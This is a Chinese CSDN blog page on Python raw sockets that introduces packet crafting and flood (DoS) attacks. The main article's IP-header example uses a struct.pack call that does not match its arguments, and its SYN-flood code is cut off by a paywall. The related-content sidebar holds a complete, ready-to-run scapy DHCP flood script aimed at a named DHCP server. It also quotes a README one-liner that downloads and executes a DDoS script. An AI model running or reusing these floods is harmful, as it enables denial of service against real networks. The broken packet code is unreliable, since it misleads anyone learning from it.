Python的原始套接字以及常见的Flood Attack示例

最新推荐文章于 2025-03-15 19:08:58 发布
最新推荐文章于 2025-03-15 19:08:58 发布
阅读量742 收藏 11
点赞数 3
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_77778490/article/details/132602042
版权

Python的原始套接字(raw sockets)提供了一种更低级别的网络编程接口,可以用来直接操作网络协议的底层操作。这使得原始套接字可以用于创建自定义的网络协议或者对现有的网络协议进行更精细的控制。

使用原始套接字,你可以直接处理IP数据包、TCP数据段和其他网络协议的数据单元。这对于需要深入控制网络协议的行为或者需要处理底层的网络数据的应用场景非常有用。

在Python中,可以使用socket模块的socket()函数来创建一个原始套接字。例如:

import socket

# 创建一个原始套接字
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)

# 或者使用更明确的方式创建原始套接字
s = socket.socket(socket.AF_INET, socket.SOCK_RAW)

注意,使用原始套接字需要小心,因为错误的处理可能导致程序崩溃或者其它不可预期的后果。此外,原始套接字通常需要对网络协议有深入的理解,因为你需要手动处理底层的网络数据。

以下是使用Python原始套接字发送IP包的示例代码:

import socket
import struct

# 构造IP头部
ip_header = struct.pack('!BBHHH',
    0x45, 0x00, 0x00, 0x2C, 0x1A, 0x3C,   # 版本号 + 头部长度 + 总长度 + TOS
    0x2C, 0x1A,                         # ID + 分片偏移量
    0x00, 0x00,                         # TTL + 协议号
    0x11, 0x22,                         # 源IP地址 + 目标IP地址
    socket.inet_aton('192.168.1.1'),     # 源IP地址
    socket.inet_aton('192.168.1.2'))     # 目标IP地址

# 构造UDP数据
udp_data = struct.pack('!HHi',
    0x1357, 0x000A, 12345)             # Source port + Destination port + Length

# 构造UDP头部
udp_header = struct.pack('!HHH',
    socket.htons(0x1357),               # Source port
    socket.htons(0x000A),               # Destination port
    len(udp_data))                      # Length

# 将UDP头部和数据添加到IP头部后面
ip_packet = ip_header + udp_header + udp_data

# 创建一个原始套接字并发送IP包
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.sendto(ip_packet, ('192.168.1.2', 0))

这段代码会构造一个IP包,其中包含一个UDP头部和数据。然后使用原始套接字将这个IP包发送到目标IP地址(在这个例子中是192.168.1.2)。注意,这个示例代码中的IP头部和UDP头部都是手动构造的,因此需要使用struct模块来将它们打包成二进制格式。

原始套接字最大的用处是可以自己构造IP包,这使得原始套接字在flood攻击中得到了广泛应用。下面是几个常见的使用原始套接字进行flood攻击的示例代码:

1."SYN"攻击是拒绝服务(DoS)的一种攻击方式,主要针对TCP协议。在Python中,可以使用socket模块来模拟这种攻击。以下是一个简单的示例代码:

import socket
import struct
import time

def syn_attack(target_ip, target_port, send_rate):
    # 构造IP头部
    ip_header = struct.pack('!BBHHH',
        0x45,
最低0.47元/天 解锁文章
Python原始套接字编程实例解析
12-20
这篇文章主要介绍了Python原始套接字编程实例解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 在实验中需要自己构造单独的HTTP数据报文,而使用SOCK_STREAM进行发送数据包,需要进行完整的TCP交互。 因此想使用原始套接字进行编程,直接构造数据包,并在IP层进行发送,即采用SOCK_RAW进行数据发送。 使用SOCK_RAW的优势是,可以对数据包进行完整的修改,可以处理IP层上的所有数据包,对各字段进行修改,而不受UDP和TCP的限制。 下面开始构造HTTP数据包, IP层和TCP层使用python的Impacket库,http
python网络套接字_Python中利用原始套接字进行网络编程的示例
weixin_39609483的博客
12-09 180
在实验中需要自己构造单独的HTTP数据报文,而使用SOCK_STREAM进行发送数据包,需要进行完整的TCP交互。因此想使用原始套接字进行编程,直接构造数据包,并在IP层进行发送,即采用SOCK_RAW进行数据发送。使用SOCK_RAW的优势是,可以对数据包进行完整的修改,可以处理IP层上的所有数据包,对各字段进行修改,而不受UDP和TCP的限制。下面开始构造HTTP数据包,IP层和TCP层使用p...
python模拟TCP,UDP
最新发布
Raners_的博客
03-15 625
socket又称“套接字”,是应用程序与底层协议栈的桥梁。socket上连应用程序,下连TCP/UDP协议,使开发者无需直接操作底层协议即可实现网络通信。,确保数据能够准确的传输到目标进程。
Python 原始套接字和流量嗅探
优快云
05-28 1万+
Python提供了原始套接字Raw Sockets)的支持,这使得我们可以使用Python进行流量嗅探和网络数据包分析。原始套接字允许我们直接访问网络层的数据包,而不经过操作系统的传输层协议栈。
python原始套接字_python原始套接字编程示例分享
weixin_39993301的博客
12-24 131
下面开始构造HTTP数据包,IP层和TCP层使用python的Impacket库,http内容自行填写。#!/usr/bin/env python#-------------------------------------------------------------------------------# Name: raw_http.py# Purpose: constru...
关于《Python绝技:运用Python成为顶级黑客》的学习笔记
热门推荐
Mi1k7ea
06-10 4万+
本篇文章主要把《Python绝技:运用Python成为顶级黑客》中的代码敲一遍,学学Python安全相关的编程与思路,然后根据具体的情况修改一下代码。   第一章——入门 1、准备开发环境 安装第三方库: 安装Python-nmap包:   wget http://xael.org/norman/python/python-nmap/pythonnmap-0.2.4.tar.gz-O...
from scapy.all import * from scapy.utils import mac2str import random import time import logging from multiprocessing import Process from ipaddress import ip_network, IPv4Address # 配置参数 INTERFACE = "WLAN" # 改为实际网卡名 BATCH_SIZE = 3000 # 单批报文数量提升50% FLOOD_INTERVAL = 0.003 # 间隔缩短至3毫秒 PROCESS_COUNT = 15 # 进程数增加50% ATTACK_DURATION = 3600 # 持续攻击1小时 DHCP_SERVER_IP = "10.168.116.1" # DHCP服务器地址 # 配置日志 logging.basicConfig( filename="dhcp_flood.log", level=logging.INFO, format='%(asctime)s - %(levelname)s: %(message)s' ) def generate_legit_mac(): vendors = { "VMware": "00:0C:29", "Hyper-V": "00:03:FF", "Parallels": "00:1C:42", "VirtualBox": "08:00:27" } vendor = random.choice(list(vendors.values())) suffix = ":".join(f"{random.randint(0, 255):02x}" for _ in range(3)) return f"{vendor}:{suffix}".upper() def generate_random_ip(): subnet = ip_network("10.168.116.0/24", strict=False) return str(next(subnet.hosts())) def craft_dhcp_packets(): pkts = [] for _ in range(BATCH_SIZE): mac = generate_legit_mac() xid = random.randint(1, 0xFFFFFFFF) ip = generate_random_ip() # 构造混合类型报文 pkts.extend([ # Discover Ether(dst="ff:ff:ff:ff:ff:ff", src=mac)/ IP(src="0.0.0.0", dst="255.255.255.255")/ UDP(sport=68, dport=67)/ BOOTP(chaddr=mac2str(mac), xid=xid)/ DHCP(options=[ ("message-type", "discover"), ("hostname", f"ATTACKER-{random.randint(1000, 9999)}"), "end" ]), # Request Ether(dst="ff:ff:ff:ff:ff:ff", src=mac)/ IP(src="0.0.0.0", dst="255.255.255.255")/ UDP(sport=68, dport=67)/ BOOTP(chaddr=mac2str(mac), xid=xid)/ DHCP(options=[ ("message-type", "request"), ("requested_addr", ip), ("server_id", DHCP_SERVER_IP), "end" ]), # Release(新增) Ether(dst="ff:ff:ff:ff:ff:ff", src=mac)/ IP(src="0.0.0.0", dst="255.255.255.255")/ UDP(sport=68, dport=67)/ BOOTP(chaddr=mac2str(mac), xid=xid)/ DHCP(options=[ ("message-type", "release"), ("lease_time", 0), "end" ]) ]) return pkts def flood_attack(): end_time = time.time() + ATTACK_DURATION try: while time.time() < end_time: packets = craft_dhcp_packets() sendp(packets, iface=INTERFACE, verbose=0) logging.info(f"Sent {len(packets)} packets") time.sleep(FLOOD_INTERVAL) except Exception as e: logging.error(f"Attack error: {str(e)}") if __name__ == "__main__": print("[*] 启动终极DHCP洪水攻击,按Ctrl+C停止") processes = [] for _ in range(PROCESS_COUNT): p = Process(target=flood_attack) p.daemon = True p.start() processes.append(p) try: while True: time.sleep(1) except KeyboardInterrupt: print("\n[!] 攻击终止") for p in processes: p.terminate()
03-13
sendp(packets, iface=INTERFACE) # 原始套接字发包 time.sleep(FLOOD_INTERVAL) # 精确控制发送间隔 ``` 3. **多进程加速** ```python for _ in range(PROCESS_COUNT): # 15个进程并发 p = Process(target=...
Python网络编程:构建高效可靠的网络应用
![Python网络编程:构建高效可靠的网络应用]...Python网络编程是利用Python语言构建网络应用和服务的技术。它提供了一系列强大的库和工具,使开发人员能够轻松地创建
Python脚本自动化tcpdump】:打造无人值守的抓包过滤系统
![python调用tcpdump抓...接着,详细讨论了如何利用Python脚本捕获和过滤网络数据包,以及对结果进行处理的策略。文章进一步阐述了自动化脚本的设计、编码、调试和用户交互的实现,以及异常处理和日志记录的重要机制。
python黑帽子学习笔记(四)——网络:原始套接字和流量嗅探
qq_40909772的博客
10-23 990
1.(1)简单的包嗅探。 套接字:TCP用主机的IP地址加上主机上的端口号作为TCP连接的端点,这种端点就叫做套接字(socket)或插口,套接字用(IP地址:端口号)表示。 (2)代码。 # -*- coding: UTF-8 -*- import socket import os #监听的主机 host = &amp;quot;172.22.93.25&amp;quot; #创建原始套接字,然后绑定在公开接口上 if os....
python使用原始套接字发送二层包(链路层帧)的方法
09-19
今天小编就为大家分享一篇python使用原始套接字发送二层包(链路层帧)的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Python中利用原始套接字进行网络编程的示例
09-22
主要介绍了Python中利用原始套接字进行网络编程的示例,使用sock_raw接受和发送数据包可以避开网络协议的诸多限制,需要的朋友可以参考下
Python-UDP-Flood:使用 python 进行的非常基本的 DOS 攻击
05-29
Python-UDP-洪水 使用 python 进行的非常基本的 DOS 攻击。 可以使用多台计算机将其转换为DDOS攻击。 我不对您使用此程序提供的使用负责。 它支持UDP和TCP 用法 下载或复制rundos.sh的脚本 也许你应该这样做才能让它发挥作用。 chmod +x rundos.sh 自动安装脚本 wget -O ddos.sh ' https://raw.githubusercontent.com/XaviFortes/Python-UDP-Flood/master/rundos.sh ' && chmod +x ddos.sh && ./ddos.sh 运行此代码并想再次打开它后,只需执行以下操作: ./ddos.sh 如果你想要一个自动更新的 bash 脚本(我认为它不会更新太多),把自动安装脚本放在一个 .sh 文件中 视窗 如果你在 Windows 上
套接字及其编程(python
qq_28414091的博客
04-26 917
socket(套接字)是一个抽象层,允许应用程序将I/O接入网络,与网络中其他应用程序进行通信。
python:实现套接字编程(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-15 85
python:实现套接字编程(附完整源码)
Python实现常见泛洪攻击
neutra_bayet的博客
07-19 1377
Python实现基本泛洪攻击
python在数据链路层使用原始套接字(rawsocket)发送接收数据
MZ21G的博客
11-23 2263
最近工作上有一项任务需要使用python在数据链路层上收发数据,遇到了很多坑,在此记录一下 代码如下: #!/usr/bin/env python # -*- coding:utf-8 -*- # author:chenyanzhi # datetime:2020/11/20 17:16 # software: PyCharm import binascii import socket import uuid def get_mac_address(): """获取本机MAC地址"""
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值